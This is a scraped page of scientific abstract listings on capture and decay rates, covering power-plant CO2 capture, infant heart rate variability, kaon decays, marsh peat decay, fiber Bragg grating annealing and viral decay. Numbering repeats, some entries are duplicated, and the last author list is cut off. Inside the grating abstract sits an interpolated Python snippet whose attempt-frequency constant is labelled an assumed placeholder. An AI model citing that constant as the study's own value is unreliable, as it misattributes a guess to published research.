The Energy Research Center has compiled a list of heat rate improvements that plant operators may implement before installing a CO2 capture system. The goal of these improvements is to upgrade the performance of existing units and partially offset the negative effects of adding a CO2 capture system. Analyses were performed in Aspen Plus to determine the effectiveness of these heat rate improvements in preserving the net power and net unit heat rate (NUHR) of four different power generator units. For the units firing high-moisture sub-bituminous coal, the heat rate improvements reduced NUHR by an average of 13.69% across a CO 2 capture level range of 50% to 90%. For the units firing bituminous coal across the same CO2 capture range, the heat rate improvements reduced NUHR by an average of 12.30%. Regardless of the units' coal or steam turbine cycle type, the heat rate improvements preserved 9.7% to 11.0% of each unit's net power across the same CO2 capture range. In general, the heat rate improvements were found to be most effective in improving the performance of units firing high-moisture sub-bituminous. The effect of the CO2 capture system on these units and the reasons for the improvements' greater effectiveness in them are described in this thesis. 17. An equivalent dissipation rate model for capturing history effects in non-premixed flames DOE PAGES Kundu, Prithwish; Echekki, Tarek; Pei, Yuanjiang; ... 2016-11-11 18. An equivalent dissipation rate model for capturing history effects in non-premixed flames SciTech Connect Kundu, Prithwish; Echekki, Tarek; Pei, Yuanjiang; Som, Sibendu 2016-11-11 19. Features of Heart Rate Variability Capture Regulatory Changes During Kangaroo Care in Preterm Infants. PubMed Kommers, Deedee R; Joshi, Rohan; van Pul, Carola; Atallah, Louis; Feijs, Loe; Oei, Guid; Bambang Oetomo, Sidarto; Andriessen, Peter 2017-03-01 To determine whether heart rate variability (HRV) can serve as a surrogate measure to track regulatory changes during kangaroo care, a period of parental coregulation distinct from regulation within the incubator. Nurses annotated the starting and ending times of kangaroo care for 3 months. The pre-kangaroo care, during-kangaroo care, and post-kangaroo care data were retrieved in infants with at least 10 accurately annotated kangaroo care sessions. Eight HRV features (5 in the time domain and 3 in the frequency domain) were used to visually and statistically compare the pre-kangaroo care and during-kangaroo care periods. Two of these features, capturing the percentage of heart rate decelerations and the extent of heart rate decelerations, were newly developed for preterm infants. A total of 191 kangaroo care sessions were investigated in 11 preterm infants. Despite clinically irrelevant changes in vital signs, 6 of the 8 HRV features (SD of normal-to-normal intervals, root mean square of the SD, percentage of consecutive normal-to-normal intervals that differ by >50 ms, SD of heart rate decelerations, high-frequency power, and low-frequency/high-frequency ratio) showed a visible and statistically significant difference (P <.01) between stable periods of kangaroo care and pre-kangaroo care. HRV was reduced during kangaroo care owing to a decrease in the extent of transient heart rate decelerations. HRV-based features may be clinically useful for capturing the dynamic changes in autonomic regulation in response to kangaroo care and other changes in environment and state. Copyright © 2016 Elsevier Inc. All rights reserved. 20. 
Effects of Purge-Flow Rate on Microbubble Capture in Radial Arterial-Line Filters. PubMed Herbst, Daniel P 2016-09-01 The process of microbubble filtration from blood is complex and highly dependent on the forces of flow and buoyancy. To protect the patient from air emboli, arterial-line filters commonly use a micropore screen, a large volume housing with purpose-built shape, and a purge port to trap, separate, and remove circulating microbubbles. Although it has been proposed that an insufficient buoyancy force renders the purge port ineffective at removing microbubbles smaller than 500 μm, this research attempts to investigate the purge flow of an arterial-line filter to better understand the microbubble removal function in a typical radial filter design. As its primary objective, the study aims to determine the effect of purge-flow rate on bubble capture using air bolus injections from a syringe pump with 22-gauge needle and Doppler ultrasound bubble detection. The measureable bubble size generated in the test circuit ranged between 30 and 500 μm, while purge flow was varied between .1 and .5 L/min for testing. Statistical analysis of the test data was handled using a repeated measures design with significance set at p < .05 level. Outcomes demonstrated that higher purge flows yielded higher bubble counts, but the effect of purge-flow rate on bubble capture decreased as bubble size increased. Results also showed that purge flow from the test filter was capable of capturing all bubble sizes being generated over the entire flow range tested, and confirms utility of the purge port in removing microbubbles smaller than 500 μm. By analyzing bubble counts in the purge flow of a typical radial-filter design, this study demonstrates that currently available micropore filter technology is capable of removing the size range of bubbles that commonly pass through modern pump-oxygenator systems and should continue to be considered during extracorporeal circulation as a measure to improve patient safety. 1. Effects of Purge-Flow Rate on Microbubble Capture in Radial Arterial-Line Filters PubMed Central Herbst, Daniel P. 2016-01-01 Abstract: The process of microbubble filtration from blood is complex and highly dependent on the forces of flow and buoyancy. To protect the patient from air emboli, arterial-line filters commonly use a micropore screen, a large volume housing with purpose-built shape, and a purge port to trap, separate, and remove circulating microbubbles. Although it has been proposed that an insufficient buoyancy force renders the purge port ineffective at removing microbubbles smaller than 500 μm, this research attempts to investigate the purge flow of an arterial-line filter to better understand the microbubble removal function in a typical radial filter design. As its primary objective, the study aims to determine the effect of purge-flow rate on bubble capture using air bolus injections from a syringe pump with 22-gauge needle and Doppler ultrasound bubble detection. The measureable bubble size generated in the test circuit ranged between 30 and 500 μm, while purge flow was varied between .1 and .5 L/min for testing. Statistical analysis of the test data was handled using a repeated measures design with significance set at p < .05 level. Outcomes demonstrated that higher purge flows yielded higher bubble counts, but the effect of purge-flow rate on bubble capture decreased as bubble size increased. 
Results also showed that purge flow from the test filter was capable of capturing all bubble sizes being generated over the entire flow range tested, and confirms the utility of the purge port in removing microbubbles smaller than 500 μm. By analyzing bubble counts in the purge flow of a typical radial-filter design, this study demonstrates that currently available micropore filter technology is capable of removing the size range of bubbles that commonly pass through modern pump-oxygenator systems and should continue to be considered during extracorporeal circulation as a measure to improve patient safety. PMID:27729703 2. V⁰ → P⁰P⁰γ decay rates SciTech Connect Fajfer, S.; Oakes, R.J. 1990-10-01 The radiative decay processes of the type V⁰ → P⁰P⁰γ are described by the gauged Wess-Zumino terms in a low-energy effective Lagrangian, there being no bremsstrahlung contributions. Using such an effective Lagrangian, describing pseudoscalar and vector mesons, we have calculated the branching ratios for the decays ω → π⁰π⁰γ, ω → π⁰ηγ, ρ → π⁰π⁰γ, ρ → π⁰ηγ, φ → π⁰π⁰γ, φ → π⁰ηγ, and φ → K⁰K̄⁰γ. Since scalar mesons have been neglected, these rates provide estimates of the expected backgrounds in searches for J^π = 0⁺ resonances, particularly the possible four-quark states in φ decays. 3. The impact of sea-level rise on organic matter decay rates in Chesapeake Bay brackish tidal marshes USGS Publications Warehouse Kirwan, M.L.; Langley, J.A.; Guntenspergen, Glenn R.; Megonigal, J.P. 2013-01-01 The balance between organic matter production and decay determines how fast coastal wetlands accumulate soil organic matter. Despite the importance of soil organic matter accumulation rates in influencing marsh elevation and resistance to sea-level rise, relatively little is known about how decomposition rates will respond to sea-level rise. Here, we estimate the sensitivity of decomposition to flooding by measuring rates of decay in 87 bags filled with milled sedge peat, including soil organic matter, roots and rhizomes. Experiments were located in field-based mesocosms along 3 mesohaline tributaries of the Chesapeake Bay. Mesocosm elevations were manipulated to influence the duration of tidal inundation. Although we found no significant influence of inundation on decay rate when bags from all study sites were analyzed together, decay rates at two of the sites increased with greater flooding. These findings suggest that flooding may enhance organic matter decay rates even in water-logged soils, but that the overall influence of flooding is minor. Our experiments suggest that sea-level rise will not accelerate rates of peat accumulation by slowing the rate of soil organic matter decay. Consequently, marshes will require enhanced organic matter productivity or mineral sediment deposition to survive accelerating sea-level rise. 4. Astrophysical reaction rates for 58,60Ni(n,γ) from new neutron capture cross section measurements SciTech Connect Guber, K. H.; Derrien, H.; Leal, L. C.; Arbanas, G.; Wiarda, D.; Koehler, P. E.; Harvey, J. A.
2010-11-15 New neutron capture cross sections of 58,60Ni were measured in the energy range from 100 eV to 600 keV using the Oak Ridge Electron Linear Accelerator. The combination of these new neutron capture data with previous transmission data allowed a resonance analysis up to 900 keV using R-matrix theory. The theoretically determined direct capture cross sections were included in the analyses. From these resonance parameters and the direct capture contribution, new (n,γ) astrophysical reaction rates were determined over the entire energy range needed by the latest stellar models describing the so-called weak s process. 5. Effect of fungal decay on the hygroscopic thickness swelling rate of lignocellulosic filler-polyolefin biocomposites Kord, B.; Hosseinihashemi, S. Kh. 2014-01-01 The influence of fungal decay on the hygroscopic thickness swelling rate of lignocellulosic filler-polyolefin biocomposites has been investigated. Composites based on polypropylene (PP), bagasse fiber (BF), and a coupling agent (PP-g-MA) were made by melt compounding and injection molding. The weight ratio of BF to PP was controlled at 60/40 for all blends. The amount of coupling agent was fixed at 2% for all formulations. The samples obtained were exposed to the action of brown-rot (Coniophora puteana) and white-rot (Trametes versicolor) fungi for 8, 12, and 16 weeks according to the Kolle-flask method. The thickness swelling of the samples was evaluated by immersing them in water at room temperature for several weeks. The morphology of the composites was characterized using scanning electron microscopy (SEM). The results indicated that fungal decay had an adverse effect on the dimensional stability of the BF/PP composites due to an increase in the thickness swelling rate. The thickness swelling of white-rotted samples was higher than that of brown-rotted ones and control samples. Also, the thickness swelling of the BF/PP composites increased with increasing time of fungal decay. In addition, after 16 weeks of exposure to white-rot fungi, the composites exhibited a higher swelling rate parameter K_SR than the control samples. The K_SR of the composites was influenced both by the type of rot and the exposure time. Furthermore, the SEM micrographs showed that the extent of degradation increased with increasing exposure time to fungi. 6. Rate-dependent interface capture beyond the coffee-ring effect Li, Yanan; Yang, Qiang; Li, Mingzhu; Song, Yanlin 2016-04-01 The mechanism of droplet drying is a fundamental issue of wide concern, since controlling the deposition morphology of a droplet has a significant influence on printing, biological patterning, self-assembly and other solution-based device fabrication. Here we reveal a strikingly different kinetics-controlled deposition regime beyond the ubiquitous coffee-ring effect, in which suspended particles tend to kinetically accumulate at the air-liquid interface and deposit uniformly. When the interface shrinkage rate exceeds the average particle diffusion rate, particles in the vertical evaporation flow are captured by the descending surface, producing a surface particle jam and forming a viscous quasi-solid layer, which dramatically prevents the trapped particles from being transported to the drop edge and results in uniform deposition. This simple, robust drying regime will provide a versatile strategy to control the droplet deposition morphology, and a novel direction for interface assembly in fabricating superlattices and high-quality photonic crystal patterns. 7. 
Rate-dependent interface capture beyond the coffee-ring effect PubMed Central Li, Yanan; Yang, Qiang; Li, Mingzhu; Song, Yanlin 2016-01-01 The mechanism of droplet drying is a widely concerned fundamental issue since controlling the deposition morphology of droplet has significant influence on printing, biology pattern, self-assembling and other solution-based devices fabrication. Here we reveal a striking different kinetics-controlled deposition regime beyond the ubiquitous coffee-ring effect that suspended particles tend to kinetically accumulate at the air-liquid interface and deposit uniformly. As the interface shrinkage rate exceeds the particle average diffusion rate, particles in vertical evaporation flow will be captured by the descending surface, producing surface particle jam and forming viscous quasi-solid layer, which dramatically prevents the trapped particles from being transported to drop edge and results in uniform deposition. This simple, robust drying regime will provide a versatile strategy to control the droplet deposition morphology, and a novel direction of interface assembling for fabricating superlattices and high quality photonic crystal patterns. PMID:27090820 8. Comparison of nonmesonic hypernuclear decay rates computed in laboratory and center-of-mass coordinates SciTech Connect De Conti, C.; Barbero, C.; Galeão, A. P.; Krmpotić, F. 2014-11-11 In this work we compute the one-nucleon-induced nonmesonic hypernuclear decay rates of {sub Λ}{sup 5}He, {sub Λ}{sup 12}C and {sub Λ}{sup 13}C using a formalism based on the independent particle shell model in terms of laboratory coordinates. To ascertain the correctness and precision of the method, these results are compared with those obtained using a formalism in terms of center-of-mass coordinates, which has been previously reported in the literature. The formalism in terms of laboratory coordinates will be useful in the shell-model approach to two-nucleon-induced transitions. 9. Precision measurement of the ratio of the charged kaon leptonic decay rates NA62 Collaboration; Lazzeroni, C.; Romano, A.; Ceccucci, A.; Danielsson, H.; Falaleev, V.; Gatignon, L.; Goy Lopez, S.; Hallgren, B.; Maier, A.; Peters, A.; Piccini, M.; Riedler, P.; Frabetti, P. L.; Gersabeck, E.; Kekelidze, V.; Madigozhin, D.; Misheva, M.; Molokanova, N.; Movchan, S.; Potrebenikov, Yu.; Shkarovskiy, S.; Zinchenko, A.; Rubin, P.; Baldini, W.; Cotta Ramusino, A.; Dalpiaz, P.; Fiorini, M.; Gianoli, A.; Norton, A.; Petrucci, F.; Savrié, M.; Bizzeti, A.; Bucci, F.; Iacopini, E.; Lenti, M.; Veltri, M.; Antonelli, A.; Moulson, M.; Raggi, M.; Spadaro, T.; Eppard, K.; Hita-Hochgesand, M.; Kleinknecht, K.; Renk, B.; Wanke, R.; Winhart, A.; Winston, R.; Bolotov, V.; Duk, V.; Gushchin, E.; Ambrosino, F.; Di Filippo, D.; Massarotti, P.; Napolitano, M.; Palladino, V.; Saracino, G.; Anzivino, G.; Imbergamo, E.; Piandani, R.; Sergi, A.; Cenci, P.; Pepe, M.; Costantini, F.; Doble, N.; Giudici, S.; Pierazzini, G.; Sozzi, M.; Venditti, S.; Balev, S.; Collazuol, G.; DiLella, L.; Gallorini, S.; Goudzovski, E.; Lamanna, G.; Mannelli, I.; Ruggiero, G.; Cerri, C.; Fantechi, R.; Kurshetsov, V.; Obraztsov, V.; Popov, I.; Semenov, V.; Yushchenko, O.; D'Agostini, G.; Leonardi, E.; Serra, M.; Valente, P.; Fucci, A.; Salamon, A.; Bloch-Devaux, B.; Peyaud, B.; Engelfried, J.; Coward, D.; Kozhuharov, V.; Litov, L.; Arcidiacono, R.; Bifani, S.; Biino, C.; Dellacasa, G.; Marchetto, F.; Numao, T.; Retière, F. 
2013-02-01 A precision measurement of the ratio RK of the rates of kaon leptonic decays K±→e±ν and K±→μ±ν with the full data sample collected by the NA62 experiment at CERN in 2007-2008 is reported. The result, obtained by analysing ˜150000 reconstructed K±→e±ν candidates with 11% background contamination, is RK=(2.488±0.010)×10-5, in agreement with the Standard Model expectation. 10. Precision measurement of the ratio of the charged kaon leptonic decay rates Lazzeroni, C.; Romano, A.; Ceccucci, A.; Danielsson, H.; Falaleev, V.; Gatignon, L.; Goy Lopez, S.; Hallgren, B.; Maier, A.; Peters, A.; Piccini, M.; Riedler, P.; Frabetti, P. L.; Gersabeck, E.; Kekelidze, V.; Madigozhin, D.; Misheva, M.; Molokanova, N.; Movchan, S.; Potrebenikov, Yu.; Shkarovskiy, S.; Zinchenko, A.; Rubin, P.; Baldini, W.; Cotta Ramusino, A.; Dalpiaz, P.; Fiorini, M.; Gianoli, A.; Norton, A.; Petrucci, F.; Savrié, M.; Bizzeti, A.; Bucci, F.; Iacopini, E.; Lenti, M.; Veltri, M.; Antonelli, A.; Moulson, M.; Raggi, M.; Spadaro, T.; Eppard, K.; Hita-Hochgesand, M.; Kleinknecht, K.; Renk, B.; Wanke, R.; Winhart, A.; Winston, R.; Bolotov, V.; Duk, V.; Gushchin, E.; Ambrosino, F.; Di Filippo, D.; Massarotti, P.; Napolitano, M.; Palladino, V.; Saracino, G.; Anzivino, G.; Imbergamo, E.; Piandani, R.; Sergi, A.; Cenci, P.; Pepe, M.; Costantini, F.; Doble, N.; Giudici, S.; Pierazzini, G.; Sozzi, M.; Venditti, S.; Balev, S.; Collazuol, G.; DiLella, L.; Gallorini, S.; Goudzovski, E.; Lamanna, G.; Mannelli, I.; Ruggiero, G.; Cerri, C.; Fantechi, R.; Kurshetsov, V.; Obraztsov, V.; Popov, I.; Semenov, V.; Yushchenko, O.; D'Agostini, G.; Leonardi, E.; Serra, M.; Valente, P.; Fucci, A.; Salamon, A.; Bloch-Devaux, B.; Peyaud, B.; Engelfried, J.; Coward, D.; Kozhuharov, V.; Litov, L.; Arcidiacono, R.; Bifani, S.; Biino, C.; Dellacasa, G.; Marchetto, F.; Numao, T.; Retière, F.; NA62 Collaboration 2013-02-01 A precision measurement of the ratio RK of the rates of kaon leptonic decays K± →e± ν and K± →μ± ν with the full data sample collected by the NA62 experiment at CERN in 2007-2008 is reported. The result, obtained by analysing ∼ 150 000 reconstructed K± →e± ν candidates with 11% background contamination, is RK = (2.488 ± 0.010) ×10-5, in agreement with the Standard Model expectation. 11. An Examination of Sunspot Number Rates of Growth and Decay in Relation to the Sunspot Cycle NASA Technical Reports Server (NTRS) Wilson, Robert M.; Hathaway, David H. 2006-01-01 On the basis of annual sunspot number averages, sunspot number rates of growth and decay are examined relative to both minimum and maximum amplitudes and the time of their occurrences using cycles 12 through present, the most reliably determined sunspot cycles. Indeed, strong correlations are found for predicting the minimum and maximum amplitudes and the time of their occurrences years in advance. As applied to predicting sunspot minimum for cycle 24, the next cycle, its minimum appears likely to occur in 2006, especially if it is a robust cycle similar in nature to cycles 17-23. 12. Experimental Investigations of Changes in β-Decay Rate of 60Co and 137Cs Baurov, Yu. A.; Konradov, A. A.; Kushniruk, V. F.; Kuznetsov, E. A.; Sobolev, Yu. G.; Ryabov, Yu. V.; Senkevich, A. P.; Zadorozsny, S. V. Results of simultaneous measurements of β-decay rate with the aid of Ge(Li)-detectors performed at two laboratories 140 km apart (INR RAS, Troitsk, 60Co, and JINR, Dubna, 137Cs) from 15 March 2000 to 10 April 2000 are presented. 
Regular deviations of the count rate of γ-quanta following β-decay, of ~0.7% (INR RAS, 60Co) and ~0.2% (JINR, 137Cs) from the statistical average, are observed. The analysis of extremum deviations of the γ-quanta count rate shows that the set of directions of tangents to the Earth's parallels of latitude at the extremum points of the trajectories of motion in space of each laboratory clearly forms three separate compact subsets of directions, which agree, for the two laboratories, to an accuracy of ±10°. This phenomenon is shown not to be explainable on the basis of traditional notions. A possible explanation is suggested based on the hypothesis that there exists a new anisotropic interaction caused by the cosmological vectorial potential Ag, a new fundamental constant having, according to the experiments carried out, the right ascension coordinate α ~ 285° in the second equatorial system. This is in agreement with earlier experiments. 13. Ex vivo radioactive counts and decay rates of tissues resected during radioguided parathyroidectomy. PubMed Olson, Jordan; Repplinger, Dan; Bianco, Jesus; Chen, Herbert 2006-12-01 14. Global observation of Omori-law decay in the rate of triggered earthquakes Parsons, T. 2001-12-01 Triggered earthquakes can be large, damaging, and lethal as evidenced by the 1999 shocks in Turkey and the 2001 events in El Salvador. In this study, earthquakes with M greater than 7.0 from the Harvard CMT catalog are modeled as dislocations to calculate shear stress changes on subsequent earthquake rupture planes near enough to be affected. About 61% of earthquakes that occurred near the main shocks are associated with calculated shear stress increases, while ~39% are associated with shear stress decreases. If earthquakes associated with calculated shear stress increases are interpreted as triggered, then such events make up at least 8% of the CMT catalog. Globally, triggered earthquakes obey an Omori-law rate decay that lasts ~7-11 years after the main shock. Earthquakes associated with calculated shear stress increases occur at higher rates than background up to 240 km away from the main-shock centroid. Earthquakes triggered by smaller quakes (foreshocks) also obey Omori's law, which is one of the few time-predictable patterns evident in the global occurrence of earthquakes. These observations indicate that earthquake probability calculations which include interactions from previous shocks should incorporate a transient Omori-law decay with time. In addition, a very simple model using the observed global rate change with time and spatial distribution of triggered earthquakes can be applied to immediately assess the likelihood of triggered earthquakes following large events, and can be in place until more sophisticated analyses are conducted. 15. Thermal decay analysis of fiber Bragg gratings at different temperature annealing rates using demarcation energy approximation Gunawardena, Dinusha Serandi; Lai, Man-Hong; Lim, Kok-Sing; Ahmad, Harith 2017-03-01 In this study, the thermal degradation of gratings inscribed in three types of fiber, namely PS 1250/1500, SM 1500 and zero-water-peak single-mode fiber, is demonstrated. A comparative investigation is carried out on the aging characteristics of the gratings at three different temperature ramping rates of 3 °C/min, 6 °C/min and 9 °C/min.
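A minimal sketch of the demarcation-energy mapping referred to in this grating study, assuming the commonly used approximation E_d = k_B·T·ln(ν·t) with an assumed attempt frequency ν; the abstract itself quotes no value for ν, so the number below is only an order-of-magnitude placeholder.

```python
# Minimal sketch: mapping an annealing schedule onto a demarcation-energy axis,
# assuming E_d = k_B * T * ln(nu * t). The attempt frequency nu is an assumed
# placeholder (no value is given in the abstract above).
import math

K_B = 8.617e-5          # Boltzmann constant, eV/K
NU = 1.0e13             # assumed attempt frequency, 1/s (order-of-magnitude guess)

def demarcation_energy(temp_c, elapsed_s, nu=NU):
    """Demarcation energy (eV) reached after elapsed_s seconds at temp_c (Celsius)."""
    temp_k = temp_c + 273.15
    return K_B * temp_k * math.log(nu * elapsed_s)

# Example: a 6 C/min ramp starting from 20 C, sampled every 10 minutes.
ramp_rate = 6.0          # C per minute
for minute in range(10, 61, 10):
    temp = 20.0 + ramp_rate * minute
    ed = demarcation_energy(temp, minute * 60.0)
    print(f"t = {minute:3d} min, T = {temp:5.1f} C, E_d = {ed:.2f} eV")
```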
During the thermal annealing treatment, a significant enhancement in the grating reflectivity is observed for the PS 1250/1500 fiber from ∼1.2 eV to 1.4 eV, which indicates a thermally induced reversible effect. Higher temperature ramping rates lead to a higher regeneration temperature. In addition, the investigation also shows that, regardless of the temperature ramping rate, the thermal decay behavior of a specific fiber can be successfully characterized when represented in the demarcation energy domain. Moreover, this technique can be used to predict the thermal decay characteristics of a specific fiber. 16. Age-specificity of black-capped chickadee survival rates: Analysis of capture-recapture data USGS Publications Warehouse Loery, G.; Pollock, K.H.; Nichols, J.D.; Hines, J.E. 1987-01-01 17. Additional experimental evidence for a solar influence on nuclear decay rates Jenkins, Jere H.; Herminghuysen, Kevin R.; Blue, Thomas E.; Fischbach, Ephraim; Javorsek, Daniel; Kauffman, Andrew C.; Mundy, Daniel W.; Sturrock, Peter A.; Talnagi, Joseph W. 2012-09-01 Additional experimental evidence is presented in support of the recent hypothesis that a possible solar influence could explain fluctuations observed in the measured decay rates of some isotopes. These data were obtained during routine weekly calibrations of an instrument used for radiological safety at The Ohio State University Research Reactor using 36Cl. The detector system used was based on a Geiger-Müller gas detector, which is a robust detector system with very low susceptibility to environmental changes. A clear annual variation is evident in the data, with a maximum relative count rate observed in January/February, and a minimum relative count rate observed in July/August, for seven successive years from July 2005 to June 2011. This annual variation is not likely to have arisen from changes in the detector surroundings, as we show here. 18. Analysis of flow decay potential on Galileo [oxidizer flow rate reduction by iron nitrate precipitates] NASA Technical Reports Server (NTRS) Cole, T. W.; Frisbee, R. H.; Yavrouian, A. H. 1987-01-01 The risks posed to NASA's Galileo spacecraft by oxidizer flow decay during its extended mission to Jupiter are discussed. The Galileo spacecraft will use a nitrogen tetroxide (NTO)/monomethyl hydrazine bipropellant system with one large engine thrust-rated at a nominal 400 N, and 12 smaller engines each thrust-rated at a nominal 10 N. These smaller thrusters, because of their small valve inlet filters and small injector ports, are especially vulnerable to clogging by iron nitrate precipitates formed by NTO-wetted stainless steel components. To quantify the corrosion rates and solubility levels which will be seen during the Galileo mission, corrosion and solubility testing experiments were performed with simulated Galileo materials, propellants, and environments. The results show the potential benefits of propellant sieving in terms of iron and water impurity reduction. 19. Viral decay and viral production rates in continental-shelf and deep-sea sediments of the Mediterranean Sea. PubMed Corinaldesi, Cinzia; Dell'Anno, Antonio; Magagnini, Mirko; Danovaro, Roberto 2010-05-01 Here, for the first time, we have carried out synoptic measurements of viral production and decay rates in continental-shelf and deep-sea sediments of the Mediterranean Sea to explore the viral balance.
The net viral production and decay rates (1.1-61.2 and 0.6-13.5 × 10⁷ viruses g⁻¹ h⁻¹, respectively) were significantly correlated, and were also related to prokaryotic heterotrophic production. The addition of enzymes increased the decay rates in the surface sediments, but not in the subsurface sediments. Both the viral production and the decay rates decreased significantly in the deeper sediment layers, while the virus-to-prokaryote abundance ratio increased, suggesting a high preservation of viruses in the subsurface sediments. Viral decay did not balance viral production at any of the sites investigated, accounting on average for c. 32% of the gross viral production in the marine sediments. We estimate that the carbon (C) released by viral decay contributed 6-23% to the total C released by the viral shunt. Because only c. 2% of the viruses produced can infect other prokaryotes, the majority is not subjected to direct lysis and potentially remains as a food source for benthic consumers. The results reported here suggest that viral decay can play an important role in biogeochemical cycles and benthic trophodynamics. 20. Theoretical simulation of carrier capture and relaxation rates in quantum-dot semiconductor optical amplifiers SciTech Connect Wu, Yunhu; Zhang, Guoping; Guo, Ling; Qi, Guoqun; Li, Xiaoming 2014-06-14 Based on the Auger scattering mechanism, the carrier-carrier scattering dynamics between the two-dimensional carrier reservoir (also called the wetting layer, i.e., WL) and the confined quantum-dot ground and first excited states in quantum-dot semiconductor optical amplifiers (QD-SOAs) are investigated theoretically in this paper. The scattering rates for independent electron and hole densities are calculated. The results show an ultra-fast carrier capture (relaxation) rate of up to 1 ps⁻¹, and there is a complex dependence of the Coulomb scattering rates on the WL electron and hole densities. In addition, due to the different effective masses and level distributions, the scattering rates for electrons and holes are very different. Finally, in order to provide a direction to control (increase or decrease) the input current in realistic QD-SOA systems, a simple method is proposed to determine the trends of the carrier recovery rates with the WL carrier densities in the vicinity of the steady state. 1. Search for D0-D̄0 mixing and a measurement of the doubly Cabibbo-suppressed decay rate in D0→Kπ decays.
PubMed Aubert, B; Barate, R; Boutigny, D; Gaillard, J-M; Hicheur, A; Karyotakis, Y; Lees, J P; Robbe, P; Tisserand, V; Zghiche, A; Palano, A; Pompili, A; Chen, J C; Qi, N D; Rong, G; Wang, P; Zhu, Y S; Eigen, G; Ofte, I; Stugu, B; Abrams, G S; Borgland, A W; Breon, A B; Brown, D N; Button-Shafer, J; Cahn, R N; Charles, E; Day, C T; Gill, M S; Gritsan, A V; Groysman, Y; Jacobsen, R G; Kadel, R W; Kadyk, J; Kerth, L T; Kolomensky, Yu G; Kral, J F; Kukartsev, G; LeClerc, C; Levi, M E; Lynch, G; Mir, L M; Oddone, P J; Orimoto, T J; Pripstein, M; Roe, N A; Romosan, A; Ronan, M T; Shelkov, V G; Telnov, A V; Wenzel, W A; Harrison, T J; Hawkes, C M; Knowles, D J; Penny, R C; Watson, A T; Watson, N K; Deppermann, T; Goetzen, K; Koch, H; Lewandowski, B; Pelizaeus, M; Peters, K; Schmuecker, H; Steinke, M; Barlow, N R; Bhimji, W; Boyd, J T; Chevalier, N; Cottingham, W N; Mackay, C; Wilson, F F; Hearty, C; Mattison, T S; McKenna, J A; Thiessen, D; Kyberd, P; McKemey, A K; Blinov, V E; Bukin, A D; Golubev, V B; Ivanchenko, V N; Kravchenko, E A; Onuchin, A P; Serednyakov, S I; Skovpen, Yu I; Solodov, E P; Yushkov, A N; Best, D; Chao, M; Kirkby, D; Lankford, A J; Mandelkern, M; McMahon, S; Mommsen, R K; Roethel, W; Stoker, D P; Buchanan, C; Hadavand, H K; Hill, E J; MacFarlane, D B; Paar, H P; Rahatlou, Sh; Schwanke, U; Sharma, V; Berryhill, J W; Campagnari, C; Dahmes, B; Kuznetsova, N; Levy, S L; Long, O; Lu, A; Mazur, M A; Richman, J D; Verkerke, W; Beringer, J; Eisner, A M; Grothe, M; Heusch, C A; Lockman, W S; Schalk, T; Schmitz, R E; Schumm, B A; Seiden, A; Turri, M; Walkowiak, W; Williams, D C; Wilson, M G; Albert, J; Chen, E; Dorsten, M P; Dubois-Felsmann, G P; Dvoretskii, A; Hitlin, D G; Narsky, I; Porter, F C; Ryd, A; Samuel, A; Yang, S; Jayatilleke, S; Mancinelli, G; Meadows, B T; Sokoloff, M D; Barillari, T; Blanc, F; Bloom, P; Clark, P J; Ford, W T; Nauenberg, U; Olivas, A; Rankin, P; Roy, J; Smith, J G; van Hoek, W C; Zhang, L; Harton, J L; Hu, T; Soffer, A; Toki, W H; Wilson, R J; Zhang, J; Altenburg, D; Brandt, T; Brose, J; Colberg, T; Dickopp, M; Dubitzky, R S; Hauke, A; Lacker, H M; Maly, E; Müller-Pfefferkorn, R; Nogowski, R; Otto, S; Schubert, K R; Schwierz, R; Spaan, B; Wilden, L; Bernard, D; Bonneaud, G R; Brochard, F; Cohen-Tanugi, J; Thiebaux, Ch; Vasileiadis, G; Verderi, M; Khan, A; Lavin, D; Muheim, F; Playfer, S; Swain, J E; Tinslay, J; Bozzi, C; Piemontese, L; Sarti, A; Treadwell, E; Anulli, F; Baldini-Ferroli, R; Calcaterra, A; de Sangro, R; Falciai, D; Finocchiaro, G; Patteri, P; Peruzzi, I M; Piccolo, M; Zallo, A; Buzzo, A; Contri, R; Crosetti, G; Lo Vetere, M; Macri, M; Monge, M R; Passaggio, S; Pastore, F C; Patrignani, C; Robutti, E; Santroni, A; Tosi, S; Bailey, S; Morii, M; Grenier, G J; Lee, S-J; Mallik, U; Cochran, J; Crawley, H B; Lamsa, J; Meyer, W T; Prell, S; Rosenberg, E I; Yi, J; Davier, M; Grosdidier, G; Höcker, A; Laplace, S; Le Diberder, F; Lepeltier, V; Lutz, A M; Petersen, T C; Plaszczynski, S; Schune, M H; Tantot, L; Wormser, G; Bionta, R M; Brigljević, V; Cheng, C H; Lange, D J; Wright, D M; Bevan, A J; Fry, J R; Gabathuler, E; Gamet, R; Kay, M; Payne, D J; Sloane, R J; Touramanis, C; Aspinwall, M L; Bowerman, D A; Dauncey, P D; Egede, U; Eschrich, I; Morton, G W; Nash, J A; Sanders, P; Taylor, G P; Back, J J; Bellodi, G; Harrison, P F; Shorthouse, H W; Strother, P; Vidal, P B; Cowan, G; Flaecher, H U; George, S; Green, M G; Kurup, A; Marker, C E; McMahon, T R; Ricciardi, S; Salvatore, F; Vaitsas, G; Winter, M A; Brown, D; Davis, C L; Allison, J; Barlow, R 
J; Forti, A C; Hart, P A; Jackson, F; Lafferty, G D; Lyon, A J; Weatherall, J H; Williams, J C; Farbin, A; Jawahery, A; Kovalskyi, D; Lae, C K; Lillard, V; Roberts, D A; Blaylock, G; Dallapiccola, C; Flood, K T; Hertzbach, S S; Kofler, R; Koptchev, V B; Moore, T B; Staengle, H; Willocq, S; Cowan, R; Sciolla, G; Taylor, F; Yamamoto, R K; Mangeol, D J J; Milek, M; Patel, P M; Lazzaro, A; Palombo, F; Bauer, J M; Cremaldi, L; Eschenburg, V; Godang, R; Kroeger, R; Reidy, J; Sanders, D A; Summers, D J; Zhao, H W; Hast, C; Taras, P; Nicholson, H; Cartaro, C; Cavallo, N; De Nardo, G; Fabozzi, F; Gatto, C; Lista, L; Paolucci, P; Piccolo, D; Sciacca, C; Baak, M A; Raven, G; LoSecco, J M; Gabriel, T A; Brau, B; Pulliam, T; Brau, J; Frey, R; Iwasaki, M; Potter, C T; Sinev, N B; Strom, D; Torrence, E; Colecchia, F; Dorigo, A; Galeazzi, F; Margoni, M; Morandin, M; Posocco, M; Rotondo, M; Simonetto, F; Stroili, R; Tiozzo, G; Voci, C; Benayoun, M; Briand, H; Chauveau, J; David, P; de la Vaissière, Ch; Del Buono, L; Hamon, O; Leruste, Ph; Ocariz, J; Pivk, M; Roos, L; Stark, J; T'Jampens, S; Manfredi, P F; Re, V; Gladney, L; Guo, Q H; Panetta, J; Angelini, C; Batignani, G; Bettarini, S; Bondioli, M; Bucci, F; 